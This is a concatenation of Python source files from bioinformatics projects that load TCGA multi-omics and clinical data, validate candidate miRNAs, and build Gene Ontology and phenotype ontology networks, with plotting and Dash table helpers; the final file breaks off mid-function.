import pandas as pd
from definitions import ROOT_DIR
class GenomicData(object):
def __init__(self, cancer_type, file_path, columns="GeneSymbol|TCGA", log2_transform=True):
self.cancer_type = cancer_type
self.data = self.preprocess_expression_table(pd.read_table(file_path, sep="\t"), columns)
if log2_transform:
self.data = self.data.applymap(self.log2_transform)
# Save samples and features for this omics data
self.samples = self.data.index
self.features = self.data.columns.tolist()
# self.features.remove("bcr_sample_barcode")
def preprocess_expression_table(self, df, columns):
"""
Download
:param df:
:param columns:
:return:
"""
table = df
# Filter columns
table = table.filter(regex=columns)
# Cut TCGA column names to sample barcode
table.rename(columns=lambda x: x[:16] if ("TCGA" in x) else x, inplace=True)
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(table.columns, return_index=True)
table = table.iloc[:, i]
# Drop NA GeneSymbol rows
table.dropna(axis=0, inplace=True)
# Remove entries with unknown Gene Symbol
table = table[table.GeneSymbol != '?']
# Transpose dataframe to patient rows and GeneSymbol columns
table.index = table.GeneSymbol
table.drop(['GeneSymbol'], axis=1, inplace=True)
table = table.T
# Add column for patients barcode
# table['bcr_sample_barcode'] = table.index
# Drop duplicate columns names (Gene symbols with same name)
_, i = np.unique(table.columns, return_index=True)
table = table.iloc[:, i]
return table
def log2_transform(self, x):
return np.log2(x+1)
def get_genes_list(self):
return self.features
def get_samples_list(self):
return self.samples
class LncRNAExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "TCGA-rnaexpr.tsv")
super(LncRNAExpression, self).__init__(cancer_type, file_path)
def preprocess_expression_table(self, df, columns):
lncrna_exp = df
lncrna_names = pd.read_table(
os.path.join(ROOT_DIR, "data/tcga-assembler/LUAD/lncrna/HGNC_RNA_long_non-coding.txt"),
delimiter="\t")
lncrna_dict = pd.Series(lncrna_names.symbol.values, index=lncrna_names.ensembl_gene_id).to_dict()
# Replacing ENSG Gene ID to the lncRNA symbol name
lncrna_exp['Gene_ID'] = lncrna_exp['Gene_ID'].str.replace("[.].*", "")
lncrna_exp.replace({"Gene_ID": lncrna_dict}, inplace=True)
# Drop NA gene rows
lncrna_exp.dropna(axis=0, inplace=True)
# Transpose matrix to patients rows and genes columns
lncrna_exp.index = lncrna_exp['Gene_ID']
lncrna_exp = lncrna_exp.T.iloc[1:, :]
# Change index string to bcr_sample_barcode standard
def change_patient_barcode(s):
if "Normal" in s:
return s[s.find('TCGA'):] + "-11A"
elif "Tumor" in s:
return s[s.find('TCGA'):] + "-01A"
else:
return s
lncrna_exp.index = lncrna_exp.index.map(change_patient_barcode)
return lncrna_exp
class GeneExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "geneExp.txt")
super(GeneExpression, self).__init__(cancer_type, file_path)
class SNP(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "somaticMutation_geneLevel.txt")
super(SNP, self).__init__(cancer_type, file_path)
class miRNAExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "miRNAExp__RPM.txt")
super(miRNAExpression, self).__init__(cancer_type, file_path)
class CopyNumberVariation(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "copyNumber.txt")
super(CopyNumberVariation, self).__init__(cancer_type, file_path)
class DNAMethylation(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "")
super(DNAMethylation, self).__init__(cancer_type, file_path)
class ProteinExpression(GenomicData):
def __init__(self, cancer_type, folder_path):
file_path = os.path.join(folder_path, "protein_RPPA.txt")
super(ProteinExpression, self).__init__(cancer_type, file_path)
if __name__ == '__main__':
# table = pd.read_table(ROOT_DIR+"/data/tcga-assembler/LUAD/clinical/nationwidechildrens.org_clinical_patient_luad.txt", sep="\t")
folder_path = "/data/tcga-assembler/LUAD/lncrna/"
lncRNA_expression = LncRNAExpression(cancer_type="LUAD", folder_path=ROOT_DIR + folder_path)
```
#### File: src/utils/validate_candidate_miRNAs.py
```python
import os
from operator import itemgetter
from definitions import ROOT_DIR
VALIDATION_FILE_PATH = os.path.join(ROOT_DIR, 'data/external/TarBase_Experiment_Valid_miRNA-Targets.csv')
def recall_rate(candidate_miRNAs, validated_miRNAs):
"""
    Measures recall: the fraction of validated miRNAs that also appear among the candidate miRNAs.
    :param candidate_miRNAs: a list of selected miRNA code names
    :param validated_miRNAs: a list of validated miRNA code names
    :return: a fraction between 0 and 1, or None if candidate_miRNAs is empty
"""
if len(candidate_miRNAs) == 0:
return None
return float(len(intersection_miRNA(candidate_miRNAs, validated_miRNAs))) / len(validated_miRNAs)
def precision_rate(candidate_miRNAs, validated_miRNAs):
"""
    Measures precision: the fraction of candidate miRNAs that are experimentally validated.
    :param candidate_miRNAs: a list of selected miRNA code names
    :param validated_miRNAs: a list of validated miRNA code names
    :return: a fraction between 0 and 1, or None if candidate_miRNAs is empty
"""
if len(candidate_miRNAs) == 0:
return None
return float(len(intersection_miRNA(candidate_miRNAs, validated_miRNAs))) / len(candidate_miRNAs)
def intersection_miRNA(candidate_miRNAs, validated_miRNAs):
return set(candidate_miRNAs) & set(validated_miRNAs)
def get_miRNA_names(indices, mirna_list, miR_name=False):
if miR_name:
result = list(itemgetter(*indices)(mirna_list))
for i in range(len(result)):
result[i] = result[i].replace('hsa-', '')
return result
return itemgetter(*indices)(mirna_list)
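
# Illustrative sketch (not part of the original module): a tiny worked example of the
# recall/precision helpers above, using made-up miRNA names.
if __name__ == '__main__':
    candidates = ['hsa-mir-21', 'hsa-mir-155', 'hsa-mir-200a']
    validated = ['hsa-mir-21', 'hsa-mir-34a']
    # The intersection is {'hsa-mir-21'}, so recall = 1/2 and precision = 1/3
    print(recall_rate(candidates, validated))     # 0.5
    print(precision_rate(candidates, validated))  # 0.333...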
``` |
{
"source": "JonnyTran/nuclei-segmentation",
"score": 3
} |
#### File: src/features/associations.py
```python
import os
from definitions import ROOT_DIR
import numpy as np
import pandas as pd
import networkx as nx
import dask.dataframe as dd
from dask.multiprocessing import get
from src.features.genomicdata import GenomicData
class Association():
def __init__(self, A: GenomicData, B: GenomicData, C, bi_direction=False):
self.A = A
self.B = B
self.C = C
self.W = nx.DiGraph()
def fit(self, putative_assocs, map_function, n_jobs=4):
edges_added = 0
if putative_assocs is not None:
putative_dd = dd.from_pandas(putative_assocs, npartitions=n_jobs)
res = putative_dd.map_partitions(map_function, meta=putative_dd).compute(get=get)
for res_partition in res:
for tup in res_partition:
self.W.add_edge(tup[0], tup[1], dys=tup[2])
edges_added += 1
return edges_added
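    # Note (descriptive comment, not in the original file): this helper references names
    # that are not defined in the scope shown here (n_A, n_B, p_threshold, and the Fisher
    # r-to-z helpers reached through `self`), so it appears to have been lifted out of a
    # larger method and will not run as-is. For each putative miRNA-target pair it
    # computes the difference ("dys") between the Pearson correlations in condition A and
    # condition B, and keeps pairs with a significant change and a negative correlation in
    # at least one condition.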
def calc_dys_A_B(df, miRNA_A, miRNA_B, gene_A, gene_B):
result = []
for row in df.iterrows():
m = row[1]['MiRBase ID']
t = row[1]['Gene Symbol']
miRNA_gene_A_corr = np.dot(miRNA_A[m] - np.mean(miRNA_A[m]),
gene_A[t] - np.mean(gene_A[t])) / \
((n_A - 1) * np.std(miRNA_A[m]) * np.std(gene_A[t]))
miRNA_gene_B_corr = np.dot(miRNA_B[m] - np.mean(miRNA_B[m]),
gene_B[t] - np.mean(gene_B[t])) / \
((n_B - 1) * np.std(miRNA_B[m]) * np.std(gene_B[t]))
dys = miRNA_gene_A_corr - miRNA_gene_B_corr
p_value = self.z_to_p_value(self.fisher_r_to_z(miRNA_gene_A_corr, n_A, miRNA_gene_B_corr, n_B))
if p_value <= p_threshold and (miRNA_gene_A_corr < 0 or miRNA_gene_B_corr < 0):
result.append((m, t, p_value))
return result
``` |
{
"source": "JonnyTran/open-omics",
"score": 3
} |
#### File: open-omics/openomics/clinical.py
```python
import io
import os
from typing import List, Union
import dask.dataframe as dd
import pandas as pd
import validators
from .utils import get_pkg_data_filename
BCR_PATIENT_BARCODE_COL = "bcr_patient_barcode"
HISTOLOGIC_SUBTYPE_COL = "histologic_subtype"
PATHOLOGIC_STAGE_COL = "pathologic_stage"
TUMOR_NORMAL_COL = 'tumor_normal'
PREDICTED_SUBTYPE_COL = 'predicted_subtype'
TUMOR = "Tumor"
NORMAL = "Normal"
class ClinicalData:
"""This class manages the clinical data tables to handle the patient's
phenotype data, as well as the treatment, and sample data associated to each
patient.
"""
pathologic_stage_map = {'Stage IA': 'Stage I', 'Stage IB': 'Stage I',
'Stage IIA': 'Stage II', 'Stage IIB': 'Stage II',
'Stage IIIA': 'Stage III', 'Stage IIIB': 'Stage III'}
def __init__(self,
file: Union[str, io.StringIO, pd.DataFrame, dd.DataFrame],
patient_index: str,
columns: List[str] = None):
"""
Args:
file (str, io.StringIO, pd.DataFrame): either a path to the
patients clinical data file, or a DataFrame.
patient_index (str): the patient's ID column name
columns (List[str]): default None. Specifies the columns to import,
if None, then import all columns.
"""
# self.cohort_name = cohort_name
self.patient_column = patient_index
if columns and patient_index not in columns:
columns.append(patient_index)
if isinstance(file, (pd.DataFrame, dd.DataFrame)):
self.patient = file
elif isinstance(file, io.StringIO):
file.seek(0) # Needed since the file was previous read to extract columns information
self.patient = pd.read_table(file,
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]",
"[Discrepancy]"],
usecols=columns
)
elif isinstance(file, str) and validators.url(file):
dataurl, filename = os.path.split(file)
file = get_pkg_data_filename(dataurl + "/", filename)
self.patient = pd.read_table(file)
elif isinstance(file, str) and os.path.isfile(file):
self.patient = pd.read_table(file,
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]",
"[Discrepancy]"],
usecols=columns
)
else:
raise FileNotFoundError("{}".format(file))
self.patient_barcodes = self.patient[patient_index].tolist()
self.patient.set_index(patient_index, inplace=True)
# Rename columns
self.patient.rename({"ajcc_pathologic_tumor_stage": PATHOLOGIC_STAGE_COL,
"histological_type": HISTOLOGIC_SUBTYPE_COL,
"histologic_diagnosis.1": HISTOLOGIC_SUBTYPE_COL}, axis=1, inplace=True)
self.patient.replace({PATHOLOGIC_STAGE_COL: ClinicalData.pathologic_stage_map}, inplace=True)
@classmethod
def name(self):
"""Returns the name of the class, i.e. 'ClinicalData'"""
return self.__class__.__name__
def build_clinical_samples(self, all_samples, index="bcr_patient_barcode"):
"""Build table with samples clinical data from patients :param
all_samples:
Args:
all_samples:
index:
"""
self.samples = pd.DataFrame(index=all_samples)
self.samples.index.name = index
self.samples.index = self.samples.index.str[:-4] # Cut sample barcode for TCGA
num_samples = self.samples.shape[0]
# Merge patients clinical data with patient barcode as index
# target = pd.merge(target, self.patient,
# how="left", left_on="patient_barcode", right_on="patient_barcode")
self.samples = self.samples.join(self.patient, on=index, how="left", rsuffix="_")
if self.samples.shape[0] != num_samples:
raise Exception("Clinical data merging has wrong number of samples")
# self.samples.dropna(axis=0, subset=["bcr_patient_barcode"], inplace=True) # Remove samples without clinical data
self.samples = self.samples[self.samples[PATHOLOGIC_STAGE_COL] != "[Discrepancy]"]
self.samples.loc[self.samples.index.str.contains(
"-11"), TUMOR_NORMAL_COL] = NORMAL # Change stage label of normal samples to "Normal"
self.samples.loc[self.samples.index.str.contains(
"-01"), TUMOR_NORMAL_COL] = TUMOR # Change stage label of normal samples to "Normal"
def add_drug_response_data(self, file_path="nationwidechildrens.org_clinical_drug.txt",
patient_column="bcr_patient_barcode",
columns=None,
drug_name_col=None, response_column=None):
"""
Args:
file_path:
patient_column:
columns:
drug_name_col:
response_column:
"""
if columns is None:
columns = ['bcr_patient_barcode', 'pharmaceutical_therapy_drug_name',
'pharmaceutical_therapy_type', 'treatment_best_response']
if not os.path.exists(file_path):
raise FileNotFoundError(file_path)
self.drug_name_col = drug_name_col
self.response_column = response_column
self.drugs = pd.read_table(file_path,
sep="\t",
skiprows=[1, 2],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
usecols=columns
)
self.drugs.set_index(patient_column, inplace=True)
def add_biospecimen_data(self, file_path="genome.wustl.edu_biospecimen_sample.txt",
patient_col_name="bcr_patient_barcode",
columns=['bcr_sample_barcode', 'sample_type']):
"""
Args:
file_path:
patient_col_name:
columns:
"""
if not os.path.exists(file_path):
raise FileNotFoundError(file_path)
self.biospecimen = pd.read_table(file_path, sep="\t", skiprows=[1, ],
na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
usecols=columns
)
self.sample_barcodes = self.biospecimen[patient_col_name].tolist()
self.biospecimen.set_index(patient_col_name, inplace=True)
def get_patient_barcodes(self):
return self.patient_barcodes
def get_sample_barcodes(self):
return self.sample_barcodes
# class DrugResponse():
# def __init__(self, drugs_file_path="nationwidechildrens.org_clinical_drug.txt", patient_column="bcr_patient_barcode",
# columns=['bcr_patient_barcode', 'pharmaceutical_therapy_drug_name', 'pharmaceutical_therapy_type', 'treatment_best_response'],
# drug_name_col=None, response_column=None):
# self.drug_name_col = drug_name_col
# self.response_column = response_column
#
# self.drugs = pd.read_table(drugs_file_path,
# sep="\t",
# skiprows=[1, 2],
# na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
# usecols=columns
# )
# self.drugs.set_index(patient_column, inplace=True)
# class Biospecimen():
# def __init__(self, biospecimens_file="genome.wustl.edu_biospecimen_sample.txt", patient_col_name="bcr_patient_barcode",
# columns=['bcr_sample_barcode', 'sample_type']):
# self.biospecimen = pd.read_table(biospecimens_file, sep="\t", skiprows=[1, ],
# na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
# usecols=columns
# )
# self.sample_barcodes = self.biospecimen[patient_col_name].tolist()
# self.biospecimen.set_index(patient_col_name, inplace=True)
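
# Minimal usage sketch (illustrative only; the clinical file name below is an assumption,
# not something shipped with this module):
#
#   clinical = ClinicalData(file="nationwidechildrens.org_clinical_patient_luad.txt",
#                           patient_index="bcr_patient_barcode")
#   print(clinical.patient.head())
#   print(clinical.get_patient_barcodes()[:5])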
```
#### File: openomics/database/ontology.py
```python
from io import TextIOWrapper
from typing import Tuple, List, Dict
import networkx as nx
import numpy as np
import obonet
import pandas as pd
import tqdm
from Bio.UniProt.GOA import _gaf20iterator, _gaf10iterator
from pandas import DataFrame
from .base import Database
from .interaction import Interactions
from ..utils.df import slice_adj
class Ontology(Database):
DELIM = "|"
def __init__(self,
path,
file_resources=None,
col_rename=None,
npartitions=0,
verbose=False):
"""
        Manages dataset input processing from tables and constructs an ontology network from an .obo file. The ontology
        network is G(V,E), where an edge e_ij from child i to parent j represents "node i is_a node j".
Args:
path:
file_resources:
col_rename:
npartitions:
verbose:
"""
self.network, self.node_list = self.load_network(file_resources)
super().__init__(
path=path,
file_resources=file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def load_network(self, file_resources) -> Tuple[nx.MultiDiGraph, List[str]]:
raise NotImplementedError
def get_adjacency_matrix(self, node_list):
if hasattr(self, "adjacency_matrix"):
adjacency_matrix = self.adjacency_matrix
else:
adjacency_matrix = nx.adj_matrix(self.network, nodelist=node_list)
self.adjacency_matrix = adjacency_matrix
if node_list is None or list(node_list) == list(self.node_list):
return adjacency_matrix
elif set(node_list) < set(self.node_list):
return slice_adj(adjacency_matrix, list(self.node_list), node_list,
None)
elif not (set(node_list) < set(self.node_list)):
raise Exception("A node in node_list is not in self.node_list.")
return adjacency_matrix
def filter_network(self, namespace):
raise NotImplementedError
def filter_annotation(self, annotation: pd.Series):
go_terms = set(self.node_list)
filtered_annotation = annotation.map(lambda x: list(set(x) & go_terms)
if isinstance(x, list) else [])
return filtered_annotation
def get_child_nodes(self):
adj = self.get_adjacency_matrix(self.node_list)
leaf_terms = self.node_list[np.nonzero(adj.sum(axis=0) == 0)[1]]
return leaf_terms
def get_root_nodes(self):
adj = self.get_adjacency_matrix(self.node_list)
parent_terms = self.node_list[np.nonzero(adj.sum(axis=1) == 0)[0]]
return parent_terms
def get_dfs_paths(self, root_nodes: list, filter_duplicates=False):
"""
Return all depth-first search paths from root node(s) to children node by traversing the ontology directed graph.
Args:
root_nodes (list): ["GO:0008150"] if biological processes, ["GO:0003674"] if molecular_function, or ["GO:0005575"] if cellular_component
filter_duplicates (bool): whether to remove duplicated paths that end up at the same leaf nodes
Returns: pd.DataFrame of all paths starting from the root nodes.
"""
if not isinstance(root_nodes, list):
root_nodes = list(root_nodes)
paths = list(dfs_path(self.network.reverse(copy=True), root_nodes))
paths = list(flatten_list(paths))
paths_df = pd.DataFrame(paths)
if filter_duplicates:
paths_df = paths_df[~paths_df.duplicated(keep="first")]
paths_df = filter_dfs_paths(paths_df)
return paths_df
def remove_predecessor_terms(self, annotation: pd.Series):
leaf_terms = self.get_child_nodes()
if not annotation.map(lambda x: isinstance(x, list)).any():
annotation = annotation.str.split(self.DELIM)
go_terms_parents = annotation.map(lambda x: list(
set(x) & set(leaf_terms)) if isinstance(x, list) else None)
return go_terms_parents
@staticmethod
def get_node_color(
file="~/Bioinformatics_ExternalData/GeneOntology/go_colors_biological.csv",
):
go_colors = pd.read_csv(file)
def selectgo(x):
terms = [term for term in x if isinstance(term, str)]
if len(terms) > 0:
return terms[-1]
else:
return None
go_colors["node"] = go_colors[[
col for col in go_colors.columns if col.isdigit()
]].apply(selectgo, axis=1)
go_id_colors = go_colors[go_colors["node"].notnull()].set_index(
"node")["HCL.color"]
go_id_colors = go_id_colors[~go_id_colors.index.duplicated(
keep="first")]
print(go_id_colors.unique().shape,
go_colors["HCL.color"].unique().shape)
return go_id_colors
Ontology.to_scipy_adjacency = Interactions.to_scipy_adjacency
class HumanPhenotypeOntology(Ontology):
"""Loads the Human Phenotype Ontology database from https://hpo.jax.org/app/ .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"hp.obo": "http://purl.obolibrary.org/obo/hp.obo",
}
"""
COLUMNS_RENAME_DICT = {}
def __init__(
self,
path="https://hpo.jax.org/",
file_resources=None,
col_rename=COLUMNS_RENAME_DICT,
npartitions=0,
verbose=False,
):
"""
Handles downloading the latest Human Phenotype Ontology obo and annotation data, preprocesses them. It provide
functionalities to create a directed acyclic graph of Ontology terms, filter terms, and filter annotations.
"""
if file_resources is None:
file_resources = {
"hp.obo": "http://purl.obolibrary.org/obo/hp.obo",
}
super().__init__(
path,
file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def info(self):
print("network {}".format(nx.info(self.network)))
def load_network(self, file_resources):
for file in file_resources:
if ".obo" in file:
network = obonet.read_obo(file_resources[file])
# network = network.reverse(copy=True)
node_list = np.array(network.nodes)
return network, node_list
def gafiterator(handle):
inline = handle.readline()
if inline.strip().startswith("!gaf-version: 2"):
# sys.stderr.write("gaf 2.0\n")
return _gaf20iterator(handle)
elif inline.strip() == "!gaf-version: 1.0":
# sys.stderr.write("gaf 1.0\n")
return _gaf10iterator(handle)
else:
return _gaf20iterator(handle)
class GeneOntology(Ontology):
"""Loads the GeneOntology database from http://geneontology.org .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
"""
COLUMNS_RENAME_DICT = {
"DB_Object_Symbol": "gene_name",
"DB_Object_ID": "gene_id",
"GO_ID": "go_id",
}
def __init__(
self,
path="http://geneontology.org/gene-associations/",
file_resources=None,
col_rename=COLUMNS_RENAME_DICT,
npartitions=0,
verbose=False,
):
"""
Loads the GeneOntology database from http://geneontology.org .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
Handles downloading the latest Gene Ontology obo and annotation data, preprocesses them. It provide
functionalities to create a directed acyclic graph of GO terms, filter terms, and filter annotations.
"""
if file_resources is None:
file_resources = {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
super().__init__(
path,
file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def info(self):
print("network {}".format(nx.info(self.network)))
def load_dataframe(self, file_resources: Dict[str, TextIOWrapper], npartitions=None):
go_annotations = pd.DataFrame.from_dict(dict(self.network.nodes(data=True)), orient='index')
go_annotations["def"] = go_annotations["def"].apply(lambda x: x.split('"')[1] if isinstance(x, str) else None)
go_annotations.index.name = "go_id"
# Handle .gaf annotation files
gaf_annotation_dfs = []
for file in file_resources:
if ".gaf" in file:
go_lines = []
for line in tqdm.tqdm(gafiterator(file_resources[file]), desc=file):
go_lines.append(line)
gaf_annotation_dfs.append(pd.DataFrame(go_lines))
if len(gaf_annotation_dfs):
self.gaf_annotations: pd.DataFrame = pd.concat(gaf_annotation_dfs).reset_index(drop=True)
self.gaf_annotations = self.gaf_annotations.rename(columns=self.COLUMNS_RENAME_DICT)
self.gaf_annotations["Date"] = pd.to_datetime(self.gaf_annotations["Date"], )
print("gaf_annotations:", self.gaf_annotations.columns.tolist())
return go_annotations
def load_network(self, file_resources):
for file in file_resources:
if ".obo" in file:
network: nx.MultiDiGraph = obonet.read_obo(file_resources[file])
# network = network.reverse(copy=True)
node_list = np.array(network.nodes)
return network, node_list
    def filter_network(self, namespace) -> None:
"""
Filter the subgraph node_list to only `namespace` terms.
Args:
namespace: one of {"biological_process", "cellular_component", "molecular_function"}
"""
terms = self.data[self.data["namespace"] == namespace]["go_id"].unique()
print("{} terms: {}".format(namespace,
len(terms))) if self.verbose else None
self.network = self.network.subgraph(nodes=list(terms))
self.node_list = np.array(list(terms))
def annotation_train_val_test_split(self, train_date: str = "2017-06-15", valid_date: str = "2017-11-15",
include: List[str] = ['EXP', 'IDA', 'IPI', 'IMP', 'IGI', 'IEP', 'TAS', 'IC'],
groupby=["gene_name"]):
gaf_annotations = self.gaf_annotations[self.gaf_annotations["Evidence"].isin(include)]
# Split train/valid/test annotations
train_go_ann = gaf_annotations[gaf_annotations["Date"] <= pd.to_datetime(train_date)]
valid_go_ann = gaf_annotations[gaf_annotations["Date"] <= pd.to_datetime(valid_date)]
test_go_ann = gaf_annotations.drop(index=valid_go_ann.index)
valid_go_ann = valid_go_ann.drop(index=train_go_ann.index)
outputs = []
for go_anns in [train_go_ann, valid_go_ann, test_go_ann]:
is_neg_ann = go_anns["Qualifier"].map(lambda li: "NOT" in li)
# Positive and negative gene-GO annotations
gene_go_anns: DataFrame = go_anns[~is_neg_ann].groupby(groupby).agg(go_id=("go_id", "unique"))
neg_anns = go_anns[is_neg_ann].groupby(groupby).agg(neg_go_id=("go_id", "unique"))
gene_go_anns["neg_go_id"] = neg_anns["neg_go_id"]
gene_go_anns.drop(index=[""], inplace=True, errors="ignore")
# Remove "GO:0005515" (protein binding) annotations for a gene if it's the gene's only annotation
gene_go_anns.loc[gene_go_anns["go_id"].map(lambda li: len(li) == 1 and "GO:0005515" in li), "go_id"] = None
gene_go_anns.drop(index=gene_go_anns.index[gene_go_anns.isna().all(1)], inplace=True)
outputs.append(gene_go_anns)
return tuple(outputs)
def get_predecessor_terms(self, annotations: pd.Series, type="is_a"):
go_terms_parents = annotations.map(
lambda annotations: list({
parent for term in annotations \
for parent in list(nx.ancestors(self.network, term))}) \
if isinstance(annotations, list) else []) # flatten(self.traverse_predecessors(term, type))}) \
return go_terms_parents
def add_predecessor_terms(self, annotation: pd.Series, return_str=False):
        if (annotation.dtypes == object
                and annotation.str.contains(r"\||;", regex=True).any()):
go_terms_annotations = annotation.str.split("|")
else:
go_terms_annotations = annotation
go_terms_parents = go_terms_annotations + self.get_predecessor_terms(annotation)
if return_str:
go_terms_parents = go_terms_parents.map(
lambda x: "|".join(x) if isinstance(x, list) else None)
return go_terms_parents
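
# Minimal usage sketch (illustrative only): with the default file_resources, instantiating
# GeneOntology downloads the .obo and .gaf files, after which the network can be filtered
# to one namespace and the annotations split chronologically.
#
#   go = GeneOntology()
#   go.filter_network(namespace="biological_process")
#   train_ann, valid_ann, test_ann = go.annotation_train_val_test_split(
#       train_date="2017-06-15", valid_date="2017-11-15")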
def traverse_predecessors(network, seed_node, type=["is_a", "part_of"]):
"""
Returns all successor terms from seed_node by traversing the ontology network with edges == `type`.
Args:
seed_node: seed node of the traversal
type: the ontology type to include
Returns:
generator of list of lists for each dfs branches.
"""
parents = dict(network.pred[seed_node])
for parent, v in parents.items():
if list(v.keys())[0] in type:
yield [parent] + list(traverse_predecessors(network, parent, type))
def flatten(lst):
return sum(([x] if not isinstance(x, list) else flatten(x) for x in lst),
[])
def dfs_path(graph, path):
node = path[-1]
successors = list(graph.successors(node))
if len(successors) > 0:
for child in successors:
yield list(dfs_path(graph, path + [child]))
else:
yield path
def flatten_list(list_in):
if isinstance(list_in, list):
for l in list_in:
if isinstance(list_in[0], list):
for y in flatten_list(l):
yield y
elif isinstance(list_in[0], str):
yield list_in
else:
yield list_in
def filter_dfs_paths(paths_df: pd.DataFrame):
idx = {}
for col in sorted(paths_df.columns[:-1], reverse=True):
idx[col] = ~(paths_df[col].notnull()
& paths_df[col].duplicated(keep="first")
& paths_df[col + 1].isnull())
idx = pd.DataFrame(idx)
paths_df = paths_df[idx.all(axis=1)]
return paths_df
def write_taxonomy(network, root_nodes, file_path):
"""
Args:
network: A network with edge(i, j) where i is a node and j is a child of i.
root_nodes (list): a list of node names
file_path (str):
"""
file = open(file_path, "a")
file.write("Root\t" + "\t".join(root_nodes) + "\n")
for root_node in root_nodes:
for node, children in nx.traversal.bfs_successors(network, root_node):
if len(children) > 0:
file.write(node + "\t" + "\t".join(children) + "\n")
file.close()
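
# Illustrative sketch (not part of the original module): writing a tiny taxonomy from a
# hand-built graph where each edge (i, j) means "j is a child of i".
#
#   g = nx.DiGraph()
#   g.add_edges_from([("root", "GO:A"), ("root", "GO:B"), ("GO:A", "GO:C")])
#   write_taxonomy(g, root_nodes=["root"], file_path="taxonomy.tsv")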
```
#### File: openomics/visualization/umap.py
```python
import numpy as np
import plotly.express as px
import umap
def d3_umap(X, y_km, heat=None):
"""
Args:
X:
y_km:
heat:
"""
reducer = umap.UMAP(random_state=1234, n_components=3)
X_embedded = reducer.fit_transform(X)
node_colors = get_node_colormap(y_km)
x, y, z = X_embedded[:, 0], X_embedded[:, 1], X_embedded[:, 2]
fig = px.scatter_3d(x=x, y=y, z=z, color=node_colors)
fig.show()
return reducer
def get_node_colormap(node_label):
"""
Args:
node_label:
"""
if type(node_label) == list:
node_labels = node_label
sorted_node_labels = sorted(set(node_labels), reverse=True)
colors = np.linspace(0, 1, len(sorted_node_labels))
node_colormap = {f: colors[sorted_node_labels.index(f)] for f in set(node_labels)}
node_colors = [node_colormap[n] if n in node_colormap.keys() else None for n in node_labels]
elif node_label.dtype == "object":
node_labels = node_label.str.split("|", expand=True)[0]
sorted_node_labels = sorted(node_labels.unique(), reverse=True)
colors = np.linspace(0, 1, len(sorted_node_labels))
node_colormap = {f: colors[sorted_node_labels.index(f)] for f in node_labels.unique()}
node_colors = [node_colormap[n] if n in node_colormap.keys() else None for n in node_labels]
elif node_label.dtype == "float":
node_labels = node_label.values
node_colormap = None
node_colors = [n / node_labels.max() for n in node_labels]
return node_colors
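
# Illustrative sketch (not part of the original module): embed a random matrix and colour
# the points by a made-up cluster label per row.
#
#   import numpy as np
#   X = np.random.rand(200, 50)
#   y_km = ["cluster_%d" % (i % 3) for i in range(200)]
#   reducer = d3_umap(X, y_km)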
```
#### File: openomics_web/layouts/datatable_view.py
```python
import dash_core_components as dcc
import dash_html_components as html
import dash_table as dt
from openomics_web.utils.str_utils import longest_common_prefix
def DataTableColumnSelect(columns):
"""
Args:
columns:
"""
longest_common_prefixes = longest_common_prefix(columns)
return html.Div([
html.Div(['Select the gene id/name column to index by:']),
dcc.Dropdown(
id='data-table-genes-col-name',
options=[{'label': col, 'value': col} for col in columns],
style={
'width': '100%',
},
value=columns[0],
),
html.Div(['Select the column prefixes to import:']),
dcc.Dropdown(
id='data-table-columns-select',
options=[{'label': col, 'value': col} for col in longest_common_prefixes],
style={
'width': '100%',
},
multi=True,
)
])
def ExpressionDataTable(df):
"""
Args:
df:
"""
return html.Div(
className="row",
children=[
html.Div(
dt.DataTable(
id='expression-datatable',
columns=[{"name": i, "id": i} for i in df.columns],
page_current=0,
page_size=20,
page_action='custom',
filter_action='custom',
filter_query='',
sort_action='custom',
sort_mode='multi',
sort_by=[],
style_as_list_view=True,
style_cell={
'overflow': 'hidden',
'textOverflow': 'clip',
'whiteSpace': 'normal'
},
style_data={'width': '30px'},
style_data_conditional=[
{'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
},
],
style_table={"maxHeight": '800px',
'width': '800px',
'marginTop': '5px',
'marginBottom': '10px',
'overflowX': 'scroll'
},
style_header={
'backgroundColor': 'white',
'fontWeight': 'bold'
},
row_selectable="multi",
selected_rows=[],
# virtualization=True,
),
style={'height': 750, 'overflowY': 'scroll'},
className='six columns'
),
html.Div(
id='table-paging-with-graph-container',
className="five columns"
)
]
)
operators = [['ge ', '>='],
['le ', '<='],
['lt ', '<'],
['gt ', '>'],
['ne ', '!='],
['eq ', '='],
['contains '],
['datestartswith ']]
def split_filter_part(filter_part):
"""
Args:
filter_part:
"""
for operator_type in operators:
for operator in operator_type:
if operator in filter_part:
name_part, value_part = filter_part.split(operator, 1)
